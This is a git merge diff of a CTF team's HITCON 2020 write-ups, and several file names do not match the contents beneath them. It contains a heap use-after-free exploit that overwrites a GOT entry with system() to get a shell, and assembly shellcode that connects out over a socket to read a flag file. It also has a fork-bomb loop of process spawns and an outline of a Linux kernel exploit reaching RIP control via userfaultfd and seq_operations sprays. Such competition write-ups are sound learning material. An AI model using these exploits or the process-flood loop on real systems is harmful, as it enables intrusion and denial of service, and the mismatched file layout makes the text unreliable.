Merge branch 'master' of github.com:perfectblue/ctf-writeups

Author: braindead

2020/HITCON/100pins/test.js

@@ -0,0 +1,5 @@
+const n = 300;
+console.log(n);
+for (var i = 0; i < n; i++) {
+	console.log(Math.random());
+}

2020/HITCON/100pins/test2.js

@@ -0,0 +1,6 @@
+const N = 5040;
+const n = 12;
+console.log(n);
+for (var i = 0; i < n; i++) {
+	console.log(Math.floor(Math.random()*N));
+}

2020/HITCON/100pins/test3.js

@@ -0,0 +1,15 @@
+const N = 100;
+const candidates = Array.from({ length: 10000 }, (_, i) =>
+  i.toString().padStart(4, "0")
+).filter((x) => new Set(x).size === 4);
+const pins = Array.from(
+  { length: N },
+  () => candidates[Math.floor(Math.random() * candidates.length)]
+);
+
+for (const pin of pins) {
+	console.log(pin);
+}
+
+const nonce = Math.random().toString(36).slice(-10);
+console.log(nonce);

2020/HITCON/100pins/tree.pickle

@@ -0,0 +1,3 @@
+# 11011001
+
+Read [solve.py](./solve.py)

2020/HITCON/11011001/README.md

@@ -0,0 +1,92 @@
+from z3 import *
+
+data = """0x00081002 == 0x00001000
+0x00029065 == 0x00029061
+0x00000000 == 0x00000000
+0x00016c40 == 0x00016c00
+0x00020905 == 0x00000805
+0x00010220 == 0x00000220
+0x00098868 == 0x00080860
+0x00021102 == 0x00021000
+0x00000491 == 0x00000481
+0x00031140 == 0x00001000
+0x00000801 == 0x00000000
+0x00060405 == 0x00000400
+0x0000c860 == 0x00000060
+0x00000508 == 0x00000400
+0x00040900 == 0x00000800
+0x00012213 == 0x00010003
+0x000428c0 == 0x00000840
+0x0000840c == 0x0000000c
+0x00043500 == 0x00002000
+0x0008105a == 0x00001000""".split("\n")
+
+s = Solver()
+cons = []
+
+for i in data:
+	temp = i.split(" == ")
+	cons.append((int(temp[0], 16), int(temp[1], 16)))
+
+bits = []
+for i in range(20):
+	a = []
+	for j in range(20):
+		test = BitVec("f" + str(i).zfill(2) + str(j).zfill(2), 8)
+		s.add(Or(test == 0, test == 1))
+		a.append(test)
+	bits.append(a)
+print(bits)
+
+for i in range(len(cons)):
+	for j in range(20):
+		mask = (cons[i][0] >> j) & 1
+		bit = (cons[i][1] >> j) & 1
+		if mask == 1:
+			# print(bits[i][j])
+			s.add(bits[i][j] == BitVecVal(bit, 8))
+
+for i in range(20):
+	tot = 0
+	tot2 = 0
+	for j in range(20):
+		tot += bits[i][j]
+		tot2 += bits[j][i]
+	s.add(tot == BitVecVal(10, 8))
+	s.add(tot2 == BitVecVal(10, 8))
+
+for i in range(20):
+	for j in range(i + 1, 20):
+		conds = []
+		conds2 = []
+		for k in range(20):
+			conds.append(bits[i][k] != bits[j][k])
+			conds2.append(bits[k][i] != bits[k][j])
+		s.add(reduce(Or, conds))
+		s.add(reduce(Or, conds2))
+
+for i in range(18):
+	for j in range(20):
+		cur = bits[i][j] + bits[i + 1][j] + bits[i + 2][j]
+		cur2 = bits[j][i] + bits[j][i + 1] + bits[j][i + 2]
+		s.add(cur != BitVecVal(3, 8))
+		s.add(cur != BitVecVal(0, 8))
+		s.add(cur2 != BitVecVal(3, 8))
+		s.add(cur2 != BitVecVal(0, 8))
+
+print(s.check())
+m = s.model()
+print(m)
+
+sices = []
+for i in range(20):
+	sice = ""
+	for j in range(20):
+		sice += str(m.eval(bits[i][j]))
+	sices.append(int(sice[::-1], 2))
+	# print(bin(sices[-1])[2:].zfill(20))
+	print(sices[-1])
+for i in range(20):
+	print(sices[i] & cons[i][0] == cons[i][1])
+
+

2020/HITCON/11011001/solve.py

@@ -0,0 +1,5 @@
+# Atoms
+
+```
+(for x in `seq 100000`; do (./demo &); done)& (for x in `seq 100000`; do (./demo &); done)& (for x in `seq 100000`; do (./demo &); done)& (for x in `seq 100000`; do (./demo &); done)&
+```

2020/HITCON/atoms/README.md

@@ -0,0 +1,3 @@
+# dual
+
+Read [solve.py](./solve.py)

2020/HITCON/dual/README.md

@@ -0,0 +1,53 @@
+victimizer = create(0) # @1
+pepega = create(0) # @2
+write_bin(pepega, "") # @3
+not_scanned = create(pepega) # @3
+victim = create(not_scanned) # @4
+
+run_gc() # victim@4 is freed
+
+fake_node = bytearray()
+fake_node += le.p64(victim) # node_id
+fake_node += le.p64(4) # mpo
+fake_node += le.p64(0) # ps
+fake_node += le.p64(0) # pe
+fake_node += le.p64(0) # pc
+fake_node += le.p64(1024) # tl
+fake_node += le.p64(1) # tpo
+fake_node += le.p32(0) # last_used
+fake_node += le.p32(0xdeadbeef) # last_used
+
+write_text(victimizer, fake_node) # @4
+
+write_text(0, "A"*256) # @5
+
+bigly_leak = read_text(victim, 1024)
+ofs = bigly_leak.find(le.p32(0xdeadbeef))+4
+ofs += 16 # malloc padding
+ofs += 8*5 # ptr of www.text
+
+
+GOT = 0x0000000000519000
+#GOT =        0xdeadbeef
+bigly_write = bigly_leak[:ofs] + le.p64(GOT) + bigly_leak[ofs+8:]
+write_text(victim, bigly_write)
+
+got_leak = read_text(0, 256)
+got_fwrite_ofs = 0x98
+
+libc_fwrite = 0x00086480
+libc_system = 0x00055410
+
+libc = le.u64(got_leak[got_fwrite_ofs:got_fwrite_ofs+8]) - libc_fwrite
+
+log.success('libc is at %s', hex(libc))
+
+got_write = bytearray(got_leak)
+got_write[got_fwrite_ofs:got_fwrite_ofs+8] = le.p64(libc + libc_system)
+
+write_text(0, got_write)
+
+write_text(victim, b"sh\x00")
+read_text(victim, 0)
+
+io.interactive(r)

2020/HITCON/dual/solve.py

@@ -0,0 +1,3 @@
+# revenge
+
+Read [solve.py](./solve.py)

2020/HITCON/revenge/README.md

@@ -0,0 +1,94 @@
+from pwn import *
+
+context.arch = "amd64"
+
+code = """call str1
+.string "stack address @ 0x000\\n"
+str1:
+pop rsi
+mov rdi, 1
+mov rdx, 22
+mov rax, 1
+syscall
+
+mov rdi, 0xdead000
+mov rsi, 0x4000
+mov rdx, 0x7
+mov r10, 0x31
+mov r8, 0
+mov r9, 0
+mov rax, 9
+syscall
+
+mov rdi, 0
+mov rsi, 0xdeae000
+mov rdx, 1000
+mov rax, 0
+syscall
+
+push 0x29
+pop rax
+push 2
+pop rdi
+push 1
+pop rsi
+cdq 
+syscall 
+mov r12, rax
+movabs rax, 0x201010101010101
+push rax
+movabs rax, 0x301017e687b0103
+xor qword ptr [rsp], rax
+push 0x2a
+pop rax
+mov rdi, r12
+push 0x10
+pop rdx
+mov rsi, rsp
+syscall 
+
+call dick
+.string "1\\n.include \\"/home/deploy/flag\\"@"
+dick:
+pop rsi
+mov rdi, r12
+mov rdx, 31
+push 1
+pop rax
+syscall
+mov rdi, r12
+mov rsi, 0xdead000
+mov rdx, 1000
+xor eax, eax
+syscall
+add rsi, 4
+cmp rsi, 10
+call dick2
+.string "Hooray! A custom ELF is executed!\\n"
+dick2:
+pop rsi
+mov rdi, r12
+mov rdx, 34
+push 1
+pop rax
+syscall
+bad:
+xor edi, edi
+push 60
+pop rax
+syscall
+"""
+
+sice = asm(code, extract=False)
+print(sice)
+a = open(sice, "rb").read()
+print(len(a))
+os.system("mv {} ./win".format(sice))
+
+
+payload = "1\n.include \"/tmp/flag.txt\""
+
+# print(eval(payload))
+print(shellcraft.stager(payload, 0x4000))
+print(asm(shellcraft.stager(payload, 0x4000)))
+

2020/HITCON/revenge/solve.py

@@ -0,0 +1,16 @@
+Spark
+=====
+
+Brief Idea:
+
+Create UAF using -> open(), open(), link(0, 1), close(1)
+reclaim UAF chunk using setxattr,
+point links to userspace and stall it using userfaultfd,
+get leaks using dmesg,
+Set fake link's node pointer to fake spark_node chunk in userspace (so it gets added to array created in traversal)
+
+close(fd[0]) -> our fake spark_node chunk in neighbours gets freed,
+it calls kfree(chunk->neighbours->arr) which we control
+so basically we have kfree(arbitrary_pointer)
+we spray seq_operations and try to get one of those vtables freed using this (some brute needed)
+and then we spray again using setxattr to reclaim that freed chunk and get RIP